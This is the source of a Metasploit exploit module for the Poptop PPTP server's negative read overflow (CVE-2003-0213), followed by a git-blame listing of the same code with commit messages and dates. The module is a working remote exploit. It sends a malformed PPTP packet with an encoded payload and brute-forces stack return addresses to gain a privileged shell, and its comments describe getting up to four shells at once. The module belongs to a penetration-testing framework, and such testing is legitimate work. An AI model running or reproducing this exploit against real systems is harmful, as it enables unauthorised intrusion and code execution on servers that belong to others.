modules/exploits/linux/pptp/poptop_negative_read.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Brute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Poptop Negative Read Overflow',
      'Description'    => %q{
          This is an exploit for the Poptop negative read overflow.  This will
        work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
        currently do not have a good way to detect Poptop versions.

        The server will by default only allow 4 concurrent manager processes
        (what we run our code in), so you could have a max of 4 shells at once.

        Using the current method of exploitation, our socket will be closed
        before we have the ability to run code, preventing the use of Findsock.
      },
      'Author'         => 'spoonm',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2003-0213'],
          ['OSVDB', '3293'],
          ['URL',   'http://securityfocus.com/archive/1/317995'],
          ['URL',   'http://www.freewebs.com/blightninjas/'],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          # Payload space is dynamically determined
          'MinNops'         => 16,
          'StackAdjustment' => -1088,
          'Compat'          =>
            {
              'ConnectionType' => '-find',
            }
        },
      'SaveRegisters'  => [ 'esp' ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['Linux Bruteforce',
            { 'Bruteforce' =>
              {
                'Start'  => { 'Ret' => 0xbffffa00 },
                'Stop'   => { 'Ret' => 0xbffff000 },
                'Step'   => 0
              }
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2003-04-09'))

    register_options(
      [
        Opt::RPORT(1723)
      ])

    register_advanced_options(
      [
        OptInt.new("PreReturnLength", [ true, "Space before we hit the return address.  Affects PayloadSpace.", 220 ]),
        OptInt.new("RetLength",       [ true, "Length of returns after payload.", 32 ]),
        OptInt.new("ExtraSpace",      [ true, "The exploit builds two protocol frames, the header frame and the control frame. " +
          "ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " +
          "If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " +
          "(these should eventually be filled in to look like a real client, ie windows).  I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
        OptString.new("Hostname",     [ false, "PPTP Packet hostname", '' ]),
        OptString.new("Vendor",       [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
      ])
  end

  # Dynamic payload space calculation
  def payload_space(explicit_target = nil)
    datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
  end

  def build_packet(length)
    [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
      [1,0].pack('cc') +
      [0].pack('n') +
      [1,1,0,2600].pack('NNnn') +
      datastore['Hostname'].ljust(64, "\x00") +
      datastore['Vendor'].ljust(64, "\x00")
  end

  def check
    connect
    sock.put(build_packet(156))
    res = sock.get_once

    if res and res =~ /MoretonBay/
      return CheckCode::Detected
    end

    return CheckCode::Safe
  end

  def brute_exploit(addrs)
    connect

    print_status("Trying #{"%.8x" % addrs['Ret']}...")

    # Construct the evil length packet
    packet =
      build_packet(1) +
      payload.encoded +
      ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

    sock.put(packet)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Brute`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
poptop ported 2007-01-28 19:02:22 +00:00			`'Name' => 'Poptop Negative Read Overflow',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This is an exploit for the Poptop negative read overflow. This will`
			`work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I`
			`currently do not have a good way to detect Poptop versions.`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`The server will by default only allow 4 concurrent manager processes`
			`(what we run our code in), so you could have a max of 4 shells at once.`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`Using the current method of exploitation, our socket will be closed`
			`before we have the ability to run code, preventing the use of Findsock.`
poptop ported 2007-01-28 19:02:22 +00:00			`},`
			`'Author' => 'spoonm',`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`['CVE', '2003-0213'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '3293'],`
poptop ported 2007-01-28 19:02:22 +00:00			`['URL', 'http://securityfocus.com/archive/1/317995'],`
			`['URL', 'http://www.freewebs.com/blightninjas/'],`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`# Payload space is dynamically determined`
			`'MinNops' => 16,`
payload compatability: no findsock allowed 2009-11-24 19:35:05 +00:00			`'StackAdjustment' => -1088,`
			`'Compat' =>`
			`{`
			`'ConnectionType' => '-find',`
			`}`
poptop ported 2007-01-28 19:02:22 +00:00			`},`
			`'SaveRegisters' => [ 'esp' ],`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_X86,`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
poptop ported 2007-01-28 19:02:22 +00:00			`[`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`['Linux Bruteforce',`
			`{ 'Bruteforce' =>`
poptop ported 2007-01-28 19:02:22 +00:00			`{`
			`'Start' => { 'Ret' => 0xbffffa00 },`
			`'Stop' => { 'Ret' => 0xbffff000 },`
			`'Step' => 0`
			`}`
			`}`
			`],`
			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2003-04-09'))`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`register_options(`
			`[`
			`Opt::RPORT(1723)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`register_advanced_options(`
			`[`
			`OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),`
			`OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),`
big msftidy pass, ping me if there are issues 2011-10-23 11:56:13 +00:00			`OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " +`
			`"ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " +`
			`"If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " +`
			`"(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),`
poptop ported 2007-01-28 19:02:22 +00:00			`OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),`
			`OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
poptop ported 2007-01-28 19:02:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`# Dynamic payload space calculation`
fix argument error due to bad override 2010-11-23 18:12:08 +00:00			`def payload_space(explicit_target = nil)`
foo 2007-01-30 04:11:14 +00:00			`datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i`
poptop ported 2007-01-28 19:02:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`def build_packet(length)`
			`[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +`
fix argument error due to bad override 2010-11-23 18:12:08 +00:00			`[1,0].pack('cc') +`
			`[0].pack('n') +`
			`[1,1,0,2600].pack('NNnn') +`
			`datastore['Hostname'].ljust(64, "\x00") +`
			`datastore['Vendor'].ljust(64, "\x00")`
poptop ported 2007-01-28 19:02:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`def check`
			`connect`
			`sock.put(build_packet(156))`
fix potential hang when server doesn't respond 2009-11-25 02:01:27 +00:00			`res = sock.get_once`
Retab modules 2013-08-30 16:28:54 -05:00
fix potential hang when server doesn't respond 2009-11-25 02:01:27 +00:00			`if res and res =~ /MoretonBay/`
fix argument error due to bad override 2010-11-23 18:12:08 +00:00			`return CheckCode::Detected`
poptop ported 2007-01-28 19:02:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
fix argument error due to bad override 2010-11-23 18:12:08 +00:00			`return CheckCode::Safe`
poptop ported 2007-01-28 19:02:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`def brute_exploit(addrs)`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`print_status("Trying #{"%.8x" % addrs['Ret']}...")`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`# Construct the evil length packet`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`packet =`
poptop ported 2007-01-28 19:02:22 +00:00			`build_packet(1) +`
			`payload.encoded +`
			`([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`sock.put(packet)`
Retab modules 2013-08-30 16:28:54 -05:00
poptop ported 2007-01-28 19:02:22 +00:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`